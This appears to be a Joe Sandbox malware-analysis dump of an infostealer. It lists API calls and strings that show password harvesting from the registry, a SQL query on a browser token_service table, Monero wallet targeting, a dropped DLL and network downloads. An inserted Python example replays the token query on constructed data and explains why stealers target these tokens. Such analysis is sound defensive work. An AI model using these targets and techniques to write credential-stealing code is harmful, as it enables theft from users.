                                        • Opcode Fuzzy Hash: 2f45c1682dbb7d0b60eb35e1d40fda76b0f5551cbfae96c5fac0e7c021cab54a
                                        • Instruction Fuzzy Hash: A9412035A1025CAFCB14DF95CC95FED7774BB88740F104199F509AA1D0CBB8AE80CB68
                                        APIs
                                          • Part of subcall function 004E7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004E739A
                                          • Part of subcall function 004E7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004E7411
                                          • Part of subcall function 004E7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004E746D
                                          • Part of subcall function 004E7330: GetProcessHeap.KERNEL32(00000000,?), ref: 004E74B2
                                          • Part of subcall function 004E7330: HeapFree.KERNEL32(00000000), ref: 004E74B9
                                        • lstrcat.KERNEL32(00000000,0050192C), ref: 004E7666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004E76A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 004E76BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004E76EF
                                        • lstrcat.KERNEL32(00000000,00501934), ref: 004E7700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004E7733
                                        • lstrcat.KERNEL32(00000000,00501938), ref: 004E774D
                                        • task.LIBCPMTD ref: 004E775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: b4998c20ca0133f9190d474867f3df9a62157f14658581ef7992ee4a73564260
                                        • Instruction ID: 61876cfb86f820af94ab3d832aceeecddc627c77218cee6168b61d0e83326689
                                        • Opcode Fuzzy Hash: b4998c20ca0133f9190d474867f3df9a62157f14658581ef7992ee4a73564260
                                        • Instruction Fuzzy Hash: 5F315271A08108DBDF09EBA1DC95EFE7779BB84305B10820EF106B72A0DA3CA945CB59
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0145E010,00000000,?,00500E14,00000000,?,00000000), ref: 004F82C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F82C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004F82E8
                                        • __aulldiv.LIBCMT ref: 004F8302
                                        • __aulldiv.LIBCMT ref: 004F8310
                                        • wsprintfA.USER32 ref: 004F833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 7045acc58df80c1678ff17867035305f998b726c820834fbb2891bee6207a43a
                                        • Instruction ID: 4def1265023d1da3712b72b709b50cdea7c8b3fa779444d242b0df35df55cead
                                        • Opcode Fuzzy Hash: 7045acc58df80c1678ff17867035305f998b726c820834fbb2891bee6207a43a
                                        • Instruction Fuzzy Hash: F421F9B1E44208ABDB04DFD5CC45FAEB7B9FB44B14F104619F715BB280C77959018BA9
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                        • InternetOpenA.WININET(00500DFB,00000001,00000000,00000000,00000000), ref: 004E615F
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004E61DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004E6203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 004E622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 004E6299
                                        • InternetCloseHandle.WININET(?), ref: 004E62A3
                                        • InternetCloseHandle.WININET(00000000), ref: 004E62B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 38c538d8a728081d00a3c4bef4ead02790f92d739f028beca6e0026c779bbee9
                                        • Instruction ID: 1936503660db1ab69b783554d8d097f96fb9f87057da2e184ec460ca1cea2da5
                                        • Opcode Fuzzy Hash: 38c538d8a728081d00a3c4bef4ead02790f92d739f028beca6e0026c779bbee9
                                        • Instruction Fuzzy Hash: 4D5152B1A0020CABDB24DF95CC45FEE7779AB44345F008199F709A71C0DB786A89CF69
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0056024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0056035B
                                        • CatchIt.LIBVCRUNTIME ref: 005603AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 005604C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 06ad7b725b57d686aa4144af296c951ac2542190995cff15f6e867a0a730a3e7
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 1EB1CC3580020AEFCF25EFA4C8899AFBFB5FF44312F10556AE9116B292D730DA51CB91
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004E739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004E7411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004E746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E74B2
                                        • HeapFree.KERNEL32(00000000), ref: 004E74B9
                                        • task.LIBCPMTD ref: 004E75B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 8d0f1de2991cb1ab3b8f47de54efd86b07f2109694dfdd92b02a70d76d2d8399
                                        • Instruction ID: b5e4fcf26f223655eea5b6e5f4f4af49c836f8418b3d97a8aff5893cc33ba710
                                        • Opcode Fuzzy Hash: 8d0f1de2991cb1ab3b8f47de54efd86b07f2109694dfdd92b02a70d76d2d8399
                                        • Instruction Fuzzy Hash: 6C612CB180416C9BDB24DB51CC41FDAB7B8BF44305F0085EAE649A6281EB746FC9CFA5
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • lstrlen.KERNEL32(00000000), ref: 004EBC6F
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 004EBC9D
                                        • lstrlen.KERNEL32(00000000), ref: 004EBD75
                                        • lstrlen.KERNEL32(00000000), ref: 004EBD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 0f65e3e0925b8f3120f83c906e38fc35c0b9415f80a15a7327d4ad074ceffa71
                                        • Instruction ID: ee2f553343ba744ed67432924ea77c3c11579a01bfb50733dd1e615a28c4b5ee
                                        • Opcode Fuzzy Hash: 0f65e3e0925b8f3120f83c906e38fc35c0b9415f80a15a7327d4ad074ceffa71
                                        • Instruction Fuzzy Hash: B6B130B191010C9BCB14FBA1CCA6EFE7739AF54305F40455EF60A63191EF386A58CB6A
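The string ID above pairs the SQL text "SELECT service, encrypted_token FROM token_service" with the StrStrA search for "AccountId" at 004EBC9D. The following Python is an added example, not code from the sample or from Joe Sandbox: it replays that query and substring filter against a constructed in-memory copy of the table, on the assumption that the target is a Chromium profile's "Web Data" SQLite file, where token_service stores OAuth refresh tokens keyed by "AccountId-<gaia id>" and encrypted with OSCrypt (on Windows a "v10"-prefixed AES-GCM blob whose key sits DPAPI-protected in Local State). Every row, blob and gaia id below is constructed.

```python
"""Replay of the stealer's token_service query (added example, not the sample's code).

Assumption: the target is a Chromium profile's 'Web Data' SQLite file, whose
token_service table keeps OAuth refresh tokens under service = 'AccountId-<gaia id>',
encrypted with OSCrypt ('v10' prefix on Windows). Rows below are constructed.
"""
import sqlite3

STEALER_QUERY = "SELECT service, encrypted_token FROM token_service"  # string from the dump
NEEDLE = "AccountId"                                                  # StrStrA argument


def build_sample_web_data() -> sqlite3.Connection:
    """In-memory stand-in for a profile's Web Data file (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE token_service ("
                "service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)")
    con.executemany("INSERT INTO token_service VALUES (?, ?)", [
        ("AccountId-1234567890", b"v10" + bytes(range(40))),      # constructed blob
        ("AccountId-0987654321", b"v10" + bytes(range(40, 80))),  # constructed blob
        ("unrelated-service", b"v10" + bytes(8)),                 # hypothetical row
    ])
    return con


def replay_stealer(con: sqlite3.Connection) -> list:
    """Run the query and apply the same substring filter the sample applies."""
    hits = []
    for service, blob in con.execute(STEALER_QUERY):
        if NEEDLE in service:  # StrStrA(service, "AccountId") returned non-NULL
            hits.append({
                "service": service,
                "gaia_id": service.split("-", 1)[1] if "-" in service else None,
                "oscrypt_v10": bytes(blob[:3]) == b"v10",  # still ciphertext at this point
                "blob_len": len(blob),
            })
    return hits


if __name__ == "__main__":
    for hit in replay_stealer(build_sample_web_data()):
        print(hit)
```

The query hands the stealer ciphertext plus the account identifier, not usable tokens; what makes it worthwhile for malware running as the logged-on user is that, under the classic OSCrypt scheme assumed here, the wrapping key is recoverable by any code in that user's context, so per-user DPAPI scope gives no protection against a user-context infostealer.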
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: cef06b57a03bec826d590fce3b3b3ad269fcaeed5b971d2de0b2e77c1cacbff3
                                        • Instruction ID: 8d9969cf622e33cc55135dee9bc213d913e07ed5c490057bdf33b83162f6a37b
                                        • Opcode Fuzzy Hash: cef06b57a03bec826d590fce3b3b3ad269fcaeed5b971d2de0b2e77c1cacbff3
                                        • Instruction Fuzzy Hash: DFF05430D0C20DEFD3489FE4E809B6C7B30EB85707F1182A5F719AA290C6784A50DB69
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004F08DC,C:\ProgramData\chrome.dll), ref: 004F9871
                                          • Part of subcall function 004EA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004EA098
                                        • StrCmpCA.SHLWAPI(00000000,01458E60), ref: 004F0922
                                        • StrCmpCA.SHLWAPI(00000000,01458F50), ref: 004F0B79
                                        • StrCmpCA.SHLWAPI(00000000,01458F80), ref: 004F0A0C
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004F0C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 004F0C30
                                        • C:\ProgramData\chrome.dll, xrefs: 004F08CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: 88cfa349fd91cf52b430171c6d73b40d1da59069a3fe8d10d4f82837cd1afcf5
                                        • Instruction ID: dfd876c4b7c9c9c9a29b63ed5f5361d52b61ec5349f5689ea22068199024a634
                                        • Opcode Fuzzy Hash: 88cfa349fd91cf52b430171c6d73b40d1da59069a3fe8d10d4f82837cd1afcf5
                                        • Instruction Fuzzy Hash: 2BA18571B002489FCB18EF65C996EBD7776FF94304F10812DE50A4F292DA349A19CB96
                                        APIs
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                        • wsprintfA.USER32 ref: 004E9E7F
                                        • lstrcat.KERNEL32(00000000,?), ref: 004E9F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 004E9F17
                                        • lstrcat.KERNEL32(00000000,005012D8), ref: 004E9F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 004E9F7C
                                        • Sleep.KERNEL32(00001388), ref: 004EA013
                                          • Part of subcall function 004F99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F99C5
                                          • Part of subcall function 004F99A0: Process32First.KERNEL32(004EA056,00000128), ref: 004F99D9
                                          • Part of subcall function 004F99A0: Process32Next.KERNEL32(004EA056,00000128), ref: 004F99F2
                                          • Part of subcall function 004F99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F9A4E
                                          • Part of subcall function 004F99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F9A6C
                                          • Part of subcall function 004F99A0: CloseHandle.KERNEL32(00000000), ref: 004F9A79
                                          • Part of subcall function 004F99A0: CloseHandle.KERNEL32(004EA056), ref: 004F9A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 531068710-2746444292
                                        • Opcode ID: 81172c982a60a89358a7870f341ebb18b36df4a2e528a8966648000a87a88dbc
                                        • Instruction ID: c62d7c2de93ef970b2a693bb89a544f9709f179ded5011415fbcdf0e5d2afd13
                                        • Opcode Fuzzy Hash: 81172c982a60a89358a7870f341ebb18b36df4a2e528a8966648000a87a88dbc
                                        • Instruction Fuzzy Hash: 5C51A7B1944308ABEB24DB60DC4AFEE7378AF44704F004599B60DAB2C1EB75AB84CF55
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 0055FA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0055FA27
                                        • _ValidateLocalCookies.LIBCMT ref: 0055FAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0055FADB
                                        • _ValidateLocalCookies.LIBCMT ref: 0055FB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 490e1f6ac4c341fd594cd3a1e3897250411e381b6df1b7f944983307050f72f0
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: FB419330900219EBCF10DF68C894A9EBFB5BF49325F148166ED19AB391D7319E09CB91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004E501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E5021
                                        • InternetOpenA.WININET(00500DE3,00000000,00000000,00000000,00000000), ref: 004E503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004E5061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004E5091
                                        • InternetCloseHandle.WININET(?), ref: 004E5109
                                        • InternetCloseHandle.WININET(?), ref: 004E5116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: cf301260655e45da14550d75d62f321f93da5a9240030bedfecf9ad5e501e6e3
                                        • Instruction ID: a87bbb7918ac0104296cecb5e15fb2205b294796d5bf9a953a93387249cca3df
                                        • Opcode Fuzzy Hash: cf301260655e45da14550d75d62f321f93da5a9240030bedfecf9ad5e501e6e3
                                        • Instruction Fuzzy Hash: DD31F5B4A0421CABDB24CF54CC85BDDB7B4AB88304F1081D9FA09A7281C7746AC58FAD
